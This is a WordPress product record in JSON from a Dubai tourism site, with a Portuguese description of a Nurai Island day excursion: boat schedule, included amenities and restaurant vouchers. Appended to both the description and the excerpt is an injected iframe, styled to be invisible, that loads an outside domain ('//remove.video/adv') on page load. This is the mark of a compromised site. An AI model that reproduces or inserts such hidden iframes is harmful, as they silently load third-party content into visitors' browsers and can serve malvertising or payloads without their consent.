{"id":20043,"date":"2019-12-18T12:21:00","date_gmt":"2019-12-18T11:21:00","guid":{"rendered":"http:\/\/13.36.35.205\/produit\/import-placeholder-for-2016810\/"},"modified":"2025-01-22T16:38:03","modified_gmt":"2025-01-22T15:38:03","slug":"ilhadenurai","status":"publish","type":"product","link":"https:\/\/soldodubai.com\/pt\/p\/ilhadenurai\/","title":{"rendered":"NURAI ISLAND, ABU DHABI"},"content":{"rendered":"<p>Esta ilha est\u00e1 situada no Emirado de Abu Dhabi, a 1 hora e 20 minutos de carro do Dubai e a 15 minutos de barco. Num piscar de olhos, sentir-se-\u00e1 como se estivesse nas Maldivas. \u00c1guas azul-turquesa e piscinas infinitas, baloi\u00e7os e redes na \u00e1gua, areia branca e paz e sossego totais. Um local perfeito para se aquecer ao sol durante um dia inteiro, tem op\u00e7\u00e3o de pernoitar no hotel, valor sob consulta.<\/p>\n<p>No Nurai, ter\u00e1 duas piscinas, balne\u00e1rios, duches, toalhas e v\u00e1rias praias, tudo inclu\u00eddo no pre\u00e7o da entrada.<br \/>\nPoder\u00e1 explorar toda a ilha a p\u00e9 ou num buggy el\u00e9trico conduzido por um membro do pessoal do hotel. A ilha disp\u00f5e de todo o tipo de equipamento para a pr\u00e1tica de desportos aqu\u00e1ticos, incluindo jet ski, banana rides, donut rides, mergulho e muito mais. A vantagem desta excurs\u00e3o \u00e9 que a maior parte da sua taxa de entrada \u00e9-lhe entregue em vales informatizados para gastar na ilha (ver abaixo).<br \/>\nPor \u00faltimo, na ilha de Nurai, pode nadar com um burkini ou biqu\u00edni.<\/p>\n<p>Partida do barco, de hora a hora, a partir das 9h30.<br \/>\nPartida e regresso do barco de hora a hora, das 15 \u00e0s 19 horas.<br \/>\nViagem do Dubai para Abu Dhabi n\u00e3o inclu\u00edda no pre\u00e7o da entrada e adicional a escolher como op\u00e7\u00e3o ou com o combo da mesquita<br \/>\nO cais est\u00e1 situado em Abu Dhabi e n\u00e3o \u00e9 acess\u00edvel por transportes p\u00fablicos (autocarro, metro).<br \/>\nHor\u00e1rio de abertura da ilha, todos os dias das 9h30 \u00e0s 19h00<br \/>\nGratuito para crian\u00e7as com menos de 5 anos<br \/>\nO cr\u00e9dito concedido com o passe di\u00e1rio pode ser utilizado nos restaurantes da ilha<\/p>\n<p><strong>O que inclui a tarifa:<\/strong><br \/>\nAcesso a toda a ilha e \u00e0s suas 2 piscinas<br \/>\nA sua viagem de barco de regresso de Abu Dhabi (viagem de 15 minutos)<br \/>\nO seu voucher informatizado para <span class=\"woocommerce-Price-amount amount\"><bdi>56.00&nbsp;<span class=\"woocommerce-Price-currencySymbol\">$<\/span><\/bdi><\/span>\/por pessoa com mais de 13 anos e <span class=\"woocommerce-Price-amount amount\"><bdi>14.00&nbsp;<span class=\"woocommerce-Price-currencySymbol\">$<\/span><\/bdi><\/span>\/por pessoa dos 5 aos 12 anos, para serem gastos livremente na ilha nos seus restaurantes<br \/>\nA sua toalha e espregui\u00e7adeira<br \/>\nDesloca\u00e7\u00e3o em buggy el\u00e9trico por pessoal da ilha<br \/>\nEstacionamento gratuito<\/p>\n<p><strong>CONSELHO:<\/strong><br \/>\nSe desejar participar em actividades de desportos n\u00e1uticos, deve reserv\u00e1-las junto do pessoal da ilha \u00e0 chegada.<br \/>\nAcesso limitado e reserva obrigat\u00f3ria<\/p>\n<p><strong>Localiza\u00e7\u00e3o:<\/strong> Ilha de Saadiyat<\/p>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"featured_media":22592,"template":"","meta":[],"product_brand":[],"product_cat":[150,553],"product_tag":[],"class_list":{"0":"post-20043","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-parc-dattractions-aquatiques","7":"product_cat-activite-couple","9":"first","10":"instock","11":"featured","12":"shipping-taxable","13":"purchasable","14":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product\/20043","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product\/20043\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/media\/22592"}],"wp:attachment":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/media?parent=20043"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_brand?post=20043"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_cat?post=20043"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_tag?post=20043"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}